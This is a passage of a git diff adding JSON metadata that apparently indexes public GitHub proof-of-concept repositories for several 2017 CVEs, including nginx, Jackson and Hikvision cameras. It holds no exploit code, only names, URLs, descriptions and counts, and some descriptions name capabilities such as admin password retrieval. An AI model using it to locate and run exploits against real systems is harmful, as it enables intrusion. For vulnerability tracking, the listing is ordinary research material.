"html_url": "https:\/\/github.com\/BassinD\/jackson-RCE", + "description": "Demo for CVE-2017-7525", + "fork": false, + "created_at": "2019-12-19T07:45:21Z", + "updated_at": "2019-12-19T08:09:43Z", + "pushed_at": "2023-01-06T00:49:10Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 2 + }, + { + "id": 244244659, + "name": "jackson-deserialization-2017-7525", + "full_name": "Dannners\/jackson-deserialization-2017-7525", + "owner": { + "login": "Dannners", + "id": 37989081, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/37989081?v=4", + "html_url": "https:\/\/github.com\/Dannners", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/Dannners\/jackson-deserialization-2017-7525", + "description": "Jackson Deserialization CVE-2017-7525 PoC", + "fork": false, + "created_at": "2020-03-02T00:10:09Z", + "updated_at": "2021-12-22T00:55:04Z", + "pushed_at": "2023-03-28T22:45:35Z", + "stargazers_count": 1, + "watchers_count": 1, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 1, + "watchers": 1, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 257829329, + "name": "CVE-2017-7525-Jackson-Deserialization-Lab", + "full_name": "Ingenuity-Fainting-Goats\/CVE-2017-7525-Jackson-Deserialization-Lab", + "owner": { + "login": "Ingenuity-Fainting-Goats", + "id": 47637846, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/47637846?v=4", + "html_url": "https:\/\/github.com\/Ingenuity-Fainting-Goats", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/Ingenuity-Fainting-Goats\/CVE-2017-7525-Jackson-Deserialization-Lab", + "description": "Insecure Java Deserialization Lab", + "fork": false, + "created_at": "2020-04-22T07:48:19Z", + "updated_at": "2023-06-22T06:33:22Z", + "pushed_at": "2024-02-05T16:50:30Z", + "stargazers_count": 5, + "watchers_count": 5, + "has_discussions": false, + "forks_count": 2, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [ + "cve-2017-7525", + "deserialization", + "exploiting", + "jackson", + "java", + "rce" + ], + "visibility": "public", + "forks": 2, + "watchers": 5, + "score": 0, + "subscribers_count": 2 + } +] \ No newline at end of file diff --git a/2017/CVE-2017-7529.json b/2017/CVE-2017-7529.json new file mode 100644 index 0000000000..8a1bfeffcc --- /dev/null +++ b/2017/CVE-2017-7529.json @@ -0,0 +1,436 @@ +[ + { + "id": 97701175, + "name": "CVE-2017-7529", + "full_name": "liusec\/CVE-2017-7529", + "owner": { + "login": "liusec", + "id": 13982415, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/13982415?v=4", + "html_url": "https:\/\/github.com\/liusec", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/liusec\/CVE-2017-7529", + "description": null, + "fork": false, + "created_at": "2017-07-19T09:55:42Z", + "updated_at": "2023-05-22T02:09:11Z", + "pushed_at": "2017-07-21T06:29:35Z", + "stargazers_count": 16, + "watchers_count": 16, + "has_discussions": false, + "forks_count": 8, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 8, + "watchers": 16, + "score": 0, + "subscribers_count": 2 + }, + { + "id": 138050203, + "name": "CVE-2017-7529_PoC", + "full_name": "en0f\/CVE-2017-7529_PoC", + "owner": { + "login": "en0f", + "id": 5394464, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/5394464?v=4", + "html_url": "https:\/\/github.com\/en0f", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/en0f\/CVE-2017-7529_PoC", + "description": "CVE-2017-7529_PoC", + "fork": false, + "created_at": "2018-06-20T15:16:10Z", + "updated_at": "2024-01-10T08:39:38Z", + "pushed_at": "2018-06-20T15:16:39Z", + "stargazers_count": 18, + "watchers_count": 18, + "has_discussions": false, + "forks_count": 26, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 26, + "watchers": 18, + "score": 0, + "subscribers_count": 2 + }, + { + "id": 166269997, + "name": "cve-2017-7529", + "full_name": "cved-sources\/cve-2017-7529", + "owner": { + "login": "cved-sources", + "id": 46423677, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/46423677?v=4", + "html_url": "https:\/\/github.com\/cved-sources", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/cved-sources\/cve-2017-7529", + "description": "cve-2017-7529", + "fork": false, + "created_at": "2019-01-17T17:47:34Z", + "updated_at": "2021-04-15T21:27:29Z", + "pushed_at": "2021-04-15T21:27:27Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 190598569, + "name": "CVE-2017-7529-POC", + "full_name": "MaxSecurity\/CVE-2017-7529-POC", + "owner": { + "login": "MaxSecurity", + "id": 16812469, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/16812469?v=4", + "html_url": "https:\/\/github.com\/MaxSecurity", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/MaxSecurity\/CVE-2017-7529-POC", + "description": null, + "fork": false, + "created_at": "2019-06-06T14:47:17Z", + "updated_at": "2023-07-13T10:42:57Z", + "pushed_at": "2019-06-06T14:53:51Z", + "stargazers_count": 4, + "watchers_count": 4, + "has_discussions": false, + "forks_count": 6, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 6, + "watchers": 4, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 272001877, + "name": "CVE-2017-7529", + "full_name": "cyberk1w1\/CVE-2017-7529", + "owner": { + "login": "cyberk1w1", + "id": 66871294, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/66871294?v=4", + "html_url": "https:\/\/github.com\/cyberk1w1", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/cyberk1w1\/CVE-2017-7529", + "description": "Exploit for NGiX 1.6.2 Remote Integer Overflow Vulnerability CVE-2017-7529", + "fork": false, + "created_at": "2020-06-13T12:11:19Z", + "updated_at": "2020-06-18T06:46:05Z", + "pushed_at": "2020-06-18T06:46:03Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 1, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 274587350, + "name": "nginx-CVE-2017-7529", + "full_name": "cyberharsh\/nginx-CVE-2017-7529", + "owner": { + "login": "cyberharsh", + "id": 57433814, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/57433814?v=4", + "html_url": "https:\/\/github.com\/cyberharsh", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/cyberharsh\/nginx-CVE-2017-7529", + "description": null, + "fork": false, + "created_at": "2020-06-24T05:57:33Z", + "updated_at": "2021-01-16T15:52:15Z", + "pushed_at": "2020-07-02T08:48:49Z", + "stargazers_count": 1, + "watchers_count": 1, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 1, + "watchers": 1, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 295851673, + "name": "nginx-overflow", + "full_name": "daehee\/nginx-overflow", + "owner": { + "login": "daehee", + "id": 81271, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/81271?v=4", + "html_url": "https:\/\/github.com\/daehee", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/daehee\/nginx-overflow", + "description": "Scans for nginx integer overflow vulnerability (CVE-2017-7529)", + "fork": false, + "created_at": "2020-09-15T21:19:17Z", + "updated_at": "2020-09-16T17:44:12Z", + "pushed_at": "2020-09-16T17:44:10Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 330894535, + "name": "exploit-nginx-1.10.3", + "full_name": "gemboxteam\/exploit-nginx-1.10.3", + "owner": { + "login": "gemboxteam", + "id": 27276452, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/27276452?v=4", + "html_url": "https:\/\/github.com\/gemboxteam", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/gemboxteam\/exploit-nginx-1.10.3", + "description": "CVE-2017-7529 | nginx on the range 0.5.6 - 1.13.2", + "fork": false, + "created_at": "2021-01-19T07:12:10Z", + "updated_at": "2023-12-26T17:34:28Z", + "pushed_at": "2021-01-19T07:17:52Z", + "stargazers_count": 8, + "watchers_count": 8, + "has_discussions": false, + "forks_count": 14, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 14, + "watchers": 8, + "score": 0, + "subscribers_count": 2 + }, + { + "id": 331347189, + "name": "Remote-Integer-Overflow-Vulnerability", + "full_name": "fardeen-ahmed\/Remote-Integer-Overflow-Vulnerability", + "owner": { + "login": "fardeen-ahmed", + "id": 47289822, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/47289822?v=4", + "html_url": "https:\/\/github.com\/fardeen-ahmed", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/fardeen-ahmed\/Remote-Integer-Overflow-Vulnerability", + "description": "Added Vulnerability Code in Python for Nginx Vulnerability (CVE-2017-7529)", + "fork": false, + "created_at": "2021-01-20T15:24:10Z", + "updated_at": "2021-06-07T10:52:03Z", + "pushed_at": "2021-06-07T10:52:01Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 353402530, + "name": "Nginx-Remote-Integer-Overflow-Vulnerability", + "full_name": "mo3zj\/Nginx-Remote-Integer-Overflow-Vulnerability", + "owner": { + "login": "mo3zj", + "id": 38070226, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/38070226?v=4", + "html_url": "https:\/\/github.com\/mo3zj", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/mo3zj\/Nginx-Remote-Integer-Overflow-Vulnerability", + "description": "CVE-2017-7529", + "fork": false, + "created_at": "2021-03-31T15:24:07Z", + "updated_at": "2022-09-05T13:57:33Z", + "pushed_at": "2021-03-31T15:27:36Z", + "stargazers_count": 1, + "watchers_count": 1, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 1, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 402153068, + "name": "CVE-2017-7529-Nginx---Remote-Integer-Overflow-Exploit", + "full_name": "fu2x2000\/CVE-2017-7529-Nginx---Remote-Integer-Overflow-Exploit", + "owner": { + "login": "fu2x2000", + "id": 34998869, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/34998869?v=4", + "html_url": "https:\/\/github.com\/fu2x2000", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/fu2x2000\/CVE-2017-7529-Nginx---Remote-Integer-Overflow-Exploit", + "description": null, + "fork": false, + "created_at": "2021-09-01T17:49:11Z", + "updated_at": "2021-09-01T17:49:46Z", + "pushed_at": "2021-09-01T17:49:43Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 515043572, + "name": "CVE-2017-7529", + "full_name": "Shehzadcyber\/CVE-2017-7529", + "owner": { + "login": "Shehzadcyber", + "id": 65858237, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/65858237?v=4", + "html_url": "https:\/\/github.com\/Shehzadcyber", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/Shehzadcyber\/CVE-2017-7529", + "description": "Nginx versions since 0.5.6 up to and including 1.13.2 are vulnerable to integer overflow vulnerability in nginx range filter module resulting into leak of potentially sensitive information triggered by specially crafted request.", + "fork": false, + "created_at": "2022-07-18T05:14:55Z", + "updated_at": "2024-10-11T15:37:36Z", + "pushed_at": "2022-07-18T05:36:33Z", + "stargazers_count": 7, + "watchers_count": 7, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 7, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 733323140, + "name": "-Exploit-CVE-2017-7529", + "full_name": "coolman6942o\/-Exploit-CVE-2017-7529", + "owner": { + "login": "coolman6942o", + "id": 76984265, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/76984265?v=4", + "html_url": "https:\/\/github.com\/coolman6942o", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/coolman6942o\/-Exploit-CVE-2017-7529", + "description": "CVE-2017-7529: Nginx versions since 0.5.6 up to and including 1.13.2 are vulnerable to integer overflow vulnerability in nginx range filter module resulting into leak of potentially sensitive information triggered by specially crafted request. ", + "fork": false, + "created_at": "2023-12-19T04:21:18Z", + "updated_at": "2023-12-19T04:25:47Z", + "pushed_at": "2023-12-19T04:32:36Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 791854049, + "name": "CVE-2017-7529", + "full_name": "SirEagIe\/CVE-2017-7529", + "owner": { + "login": "SirEagIe", + "id": 57668483, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/57668483?v=4", + "html_url": "https:\/\/github.com\/SirEagIe", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/SirEagIe\/CVE-2017-7529", + "description": "Nginx (ver. 0.5.6 - 1.13.2) Remote Integer Overflow", + "fork": false, + "created_at": "2024-04-25T13:56:31Z", + "updated_at": "2024-06-26T08:11:54Z", + "pushed_at": "2024-04-25T14:04:42Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2017/CVE-2017-7648.json b/2017/CVE-2017-7648.json new file mode 100644 index 0000000000..8e4d49b3af --- /dev/null +++ b/2017/CVE-2017-7648.json @@ -0,0 +1,33 @@ +[ + { + "id": 87845394, + "name": "CVE-2017-7648.", + "full_name": "notmot\/CVE-2017-7648.", + "owner": { + "login": "notmot", + "id": 4649277, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/4649277?v=4", + "html_url": "https:\/\/github.com\/notmot", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/notmot\/CVE-2017-7648.", + "description": "A writeup of CVE-2017-7648", + "fork": false, + "created_at": "2017-04-10T18:41:59Z", + "updated_at": "2017-04-10T18:47:31Z", + "pushed_at": "2017-04-10T18:42:00Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 2 + } +] \ No newline at end of file diff --git a/2017/CVE-2017-7651.json b/2017/CVE-2017-7651.json new file mode 100644 index 0000000000..ca2ba52e30 --- /dev/null +++ b/2017/CVE-2017-7651.json @@ -0,0 +1,64 @@ +[ + { + "id": 410108471, + "name": "MqttAttack", + "full_name": "mukkul007\/MqttAttack", + "owner": { + "login": "mukkul007", + "id": 14542345, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/14542345?v=4", + "html_url": "https:\/\/github.com\/mukkul007", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/mukkul007\/MqttAttack", + "description": "PoC for CVE-2017-7651", + "fork": false, + "created_at": "2021-09-24T21:39:29Z", + "updated_at": "2022-06-05T06:34:50Z", + "pushed_at": "2021-09-24T21:40:40Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 461861174, + "name": "CVE-2017-7651", + "full_name": "St3v3nsS\/CVE-2017-7651", + "owner": { + "login": "St3v3nsS", + "id": 36981367, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/36981367?v=4", + "html_url": "https:\/\/github.com\/St3v3nsS", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/St3v3nsS\/CVE-2017-7651", + "description": "This is the repository used for CVE-2017-7651 for exploiting mosquitto 1.4.14", + "fork": false, + "created_at": "2022-02-21T12:54:41Z", + "updated_at": "2022-02-21T13:02:17Z", + "pushed_at": "2022-02-21T13:04:00Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2017/CVE-2017-7679.json b/2017/CVE-2017-7679.json new file mode 100644 index 0000000000..a812f91fd0 --- /dev/null +++ b/2017/CVE-2017-7679.json @@ -0,0 +1,33 @@ +[ + { + "id": 120799852, + "name": "CVE-2017-7679-in-python", + "full_name": "snknritr\/CVE-2017-7679-in-python", + "owner": { + "login": "snknritr", + "id": 36276619, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/36276619?v=4", + "html_url": "https:\/\/github.com\/snknritr", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/snknritr\/CVE-2017-7679-in-python", + "description": "At this project, we made a python exploit using buffer overflow at the CVE-2017-7679", + "fork": false, + "created_at": "2018-02-08T18:21:18Z", + "updated_at": "2024-08-12T19:36:08Z", + "pushed_at": "2018-02-08T18:21:19Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 0 + } +] \ No newline at end of file diff --git a/2017/CVE-2017-7912.json b/2017/CVE-2017-7912.json new file mode 100644 index 0000000000..953f67145b --- /dev/null +++ b/2017/CVE-2017-7912.json @@ -0,0 +1,33 @@ +[ + { + "id": 103750394, + "name": "CVE-2017-7912_Sneak", + "full_name": "homjxi0e\/CVE-2017-7912_Sneak", + "owner": { + "login": "homjxi0e", + "id": 25440152, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/25440152?v=4", + "html_url": "https:\/\/github.com\/homjxi0e", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/homjxi0e\/CVE-2017-7912_Sneak", + "description": null, + "fork": false, + "created_at": "2017-09-16T12:27:48Z", + "updated_at": "2017-09-16T12:27:48Z", + "pushed_at": "2017-09-16T12:27:48Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 0 + } +] \ No newline at end of file diff --git a/2017/CVE-2017-7921.json b/2017/CVE-2017-7921.json new file mode 100644 index 0000000000..8456ae4593 --- /dev/null +++ b/2017/CVE-2017-7921.json @@ -0,0 +1,477 @@ +[ + { + "id": 259298559, + "name": "CVE-2017-7921-EXP", + "full_name": "JrDw0\/CVE-2017-7921-EXP", + "owner": { + "login": "JrDw0", + "id": 37445725, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/37445725?v=4", + "html_url": "https:\/\/github.com\/JrDw0", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/JrDw0\/CVE-2017-7921-EXP", + "description": "Hikvision camera CVE-2017-7921-EXP", + "fork": false, + "created_at": "2020-04-27T11:49:40Z", + "updated_at": "2024-10-25T14:40:51Z", + "pushed_at": "2023-12-04T15:47:16Z", + "stargazers_count": 87, + "watchers_count": 87, + "has_discussions": false, + "forks_count": 18, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 18, + "watchers": 87, + "score": 0, + "subscribers_count": 4 + }, + { + "id": 312221274, + "name": "CVE-2017-7921", + "full_name": "BurnyMcDull\/CVE-2017-7921", + "owner": { + "login": "BurnyMcDull", + "id": 20639723, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/20639723?v=4", + "html_url": "https:\/\/github.com\/BurnyMcDull", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/BurnyMcDull\/CVE-2017-7921", + "description": "海康威视未授权访问检测poc及口令爆破", + "fork": false, + "created_at": "2020-11-12T09:02:10Z", + "updated_at": "2024-08-09T08:21:21Z", + "pushed_at": "2020-11-19T08:58:04Z", + "stargazers_count": 37, + "watchers_count": 37, + "has_discussions": false, + "forks_count": 5, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 5, + "watchers": 37, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 312471106, + "name": "cve-2017-7921-golang", + "full_name": "MisakaMikato\/cve-2017-7921-golang", + "owner": { + "login": "MisakaMikato", + "id": 31957147, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/31957147?v=4", + "html_url": "https:\/\/github.com\/MisakaMikato", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/MisakaMikato\/cve-2017-7921-golang", + "description": "Hikvision IP camera access bypass exploit, developed by golang. ", + "fork": false, + "created_at": "2020-11-13T04:15:31Z", + "updated_at": "2024-08-03T00:28:48Z", + "pushed_at": "2021-01-11T05:52:22Z", + "stargazers_count": 10, + "watchers_count": 10, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 1, + "watchers": 10, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 334195499, + "name": "hikvision_CVE-2017-7921_auth_bypass_config_decryptor", + "full_name": "chrisjd20\/hikvision_CVE-2017-7921_auth_bypass_config_decryptor", + "owner": { + "login": "chrisjd20", + "id": 11812223, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/11812223?v=4", + "html_url": "https:\/\/github.com\/chrisjd20", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/chrisjd20\/hikvision_CVE-2017-7921_auth_bypass_config_decryptor", + "description": "This python file will decrypt the configurationFile used by hikvision cameras vulnerable to CVE-2017-7921.", + "fork": false, + "created_at": "2021-01-29T16:08:35Z", + "updated_at": "2024-11-06T01:07:04Z", + "pushed_at": "2021-01-29T16:22:39Z", + "stargazers_count": 97, + "watchers_count": 97, + "has_discussions": false, + "forks_count": 26, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 26, + "watchers": 97, + "score": 0, + "subscribers_count": 3 + }, + { + "id": 503605930, + "name": "hikvision_CVE-2017-7921_auth_bypass_config_decryptor", + "full_name": "p4tq\/hikvision_CVE-2017-7921_auth_bypass_config_decryptor", + "owner": { + "login": "p4tq", + "id": 107520505, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/107520505?v=4", + "html_url": "https:\/\/github.com\/p4tq", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/p4tq\/hikvision_CVE-2017-7921_auth_bypass_config_decryptor", + "description": null, + "fork": false, + "created_at": "2022-06-15T03:49:05Z", + "updated_at": "2022-06-15T03:51:16Z", + "pushed_at": "2022-06-15T03:51:13Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 515872085, + "name": "CVE-2017-7921", + "full_name": "201646613\/CVE-2017-7921", + "owner": { + "login": "201646613", + "id": 75409243, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/75409243?v=4", + "html_url": "https:\/\/github.com\/201646613", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/201646613\/CVE-2017-7921", + "description": "CVE-2017-7921-EXP Hikvision camera", + "fork": false, + "created_at": "2022-07-20T07:07:07Z", + "updated_at": "2024-06-26T13:06:56Z", + "pushed_at": "2022-07-20T09:37:27Z", + "stargazers_count": 6, + "watchers_count": 6, + "has_discussions": false, + "forks_count": 2, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 2, + "watchers": 6, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 554247442, + "name": "CVE-2017-7921-EXP", + "full_name": "inj3ction\/CVE-2017-7921-EXP", + "owner": { + "login": "inj3ction", + "id": 111491235, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/111491235?v=4", + "html_url": "https:\/\/github.com\/inj3ction", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/inj3ction\/CVE-2017-7921-EXP", + "description": null, + "fork": false, + "created_at": "2022-10-19T13:48:49Z", + "updated_at": "2022-10-19T13:50:41Z", + "pushed_at": "2022-10-19T13:51:40Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 662339786, + "name": "hikivision", + "full_name": "krypton612\/hikivision", + "owner": { + "login": "krypton612", + "id": 50895807, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/50895807?v=4", + "html_url": "https:\/\/github.com\/krypton612", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/krypton612\/hikivision", + "description": "CVE-2017-7921 EXPLOIT", + "fork": false, + "created_at": "2023-07-04T23:22:21Z", + "updated_at": "2023-07-04T23:27:33Z", + "pushed_at": "2023-07-04T23:27:28Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 670217467, + "name": "CVE-2017-7921-EXPLOIT", + "full_name": "K3ysTr0K3R\/CVE-2017-7921-EXPLOIT", + "owner": { + "login": "K3ysTr0K3R", + "id": 70909693, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/70909693?v=4", + "html_url": "https:\/\/github.com\/K3ysTr0K3R", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/K3ysTr0K3R\/CVE-2017-7921-EXPLOIT", + "description": "A PoC exploit for CVE-2017-7921 - Hikvision Camera Series Improper Authentication Vulnerability.", + "fork": false, + "created_at": "2023-07-24T14:48:38Z", + "updated_at": "2024-10-25T16:49:33Z", + "pushed_at": "2023-08-02T18:58:22Z", + "stargazers_count": 16, + "watchers_count": 16, + "has_discussions": false, + "forks_count": 5, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [ + "cve-2017-7921", + "exploit", + "hack", + "hacked", + "hikvision", + "hikvision-camera", + "information-disclosure", + "proof-of-concept", + "vulnerability" + ], + "visibility": "public", + "forks": 5, + "watchers": 16, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 683785168, + "name": "CVE-2017-7921", + "full_name": "fracergu\/CVE-2017-7921", + "owner": { + "login": "fracergu", + "id": 17405480, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/17405480?v=4", + "html_url": "https:\/\/github.com\/fracergu", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/fracergu\/CVE-2017-7921", + "description": "CVE-2017-7921 exploit. Allows admin password retrieval and automatic snapshot download.", + "fork": false, + "created_at": "2023-08-27T17:29:48Z", + "updated_at": "2023-08-27T17:30:01Z", + "pushed_at": "2023-08-27T23:09:15Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 0 + }, + { + "id": 709047323, + "name": "AnonHik", + "full_name": "AnonkiGroup\/AnonHik", + "owner": { + "login": "AnonkiGroup", + "id": 148824118, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/148824118?v=4", + "html_url": "https:\/\/github.com\/AnonkiGroup", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/AnonkiGroup\/AnonHik", + "description": "Python script get image from Hikvision camera with CVE-2017-7921 vulnerability", + "fork": false, + "created_at": 